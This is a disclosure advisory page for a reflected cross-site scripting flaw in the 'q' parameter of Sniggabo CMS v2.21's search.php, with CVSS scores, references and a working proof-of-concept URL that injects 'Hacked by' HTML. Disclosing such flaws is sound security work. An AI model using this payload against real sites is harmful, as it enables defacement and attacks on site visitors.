Sniggabo CMS v2.21 Cross Site Scripting Vulnerability

2010.03.25
Credit: Sora
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

# Exploit Title: Sniggabo CMS v2.21 Cross Site Scripting Vulnerability # Date: January 6th, 2010 # Author: Sora # Version: v2.21 # Tested on: Windows Vista Home Premium and Linux 2.6.32 ?????????????- > Sniggabo CMS v2.21 Cross Site Scripting Vulnerability > Author: Sora > Contact: vhr95zw [at] hotmail [dot] com > Website: http://greyhathackers.wordpress.com/ > Google Dork: ?In your dreams, script kiddies.? # Description: Sniggabo CMS v2.21 suffers a cross site scripting vulnerability in the parameter ?q? of search.php. # PoC: http://www.site.com/search.php?q=%3Ch1%3EHacked%20by%20Sora%20-%20vhr95zw%20[at]%20hotmail%20[dot]%20com%3C/h1%3E%3Chr%3Eh43d%20-%20http://greyhathackers.wordpress.com/%3Cbr%3E&site=www.google.ca # Bw0mp # Popc0rn # Revelation # Max Mafiotu # T3eS # Timeb0mb # [H]aruhiSuzumiya # Xermes # Mafia Boyz DZ Crew # ?? # cyber-sec.org # greyhathackers.wordpress.com # incursioexsubter.info #

References:

http://xforce.iss.net/xforce/xfdb/55472
http://www.exploit-db.com/exploits/11049
http://secunia.com/advisories/38029
http://packetstormsecurity.org/1001-exploits/sniggabocms-xss.txt
http://greyhathackers.wordpress.com/2010/01/07/sniggabo-cms-v2-21-xss-vulnerability/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top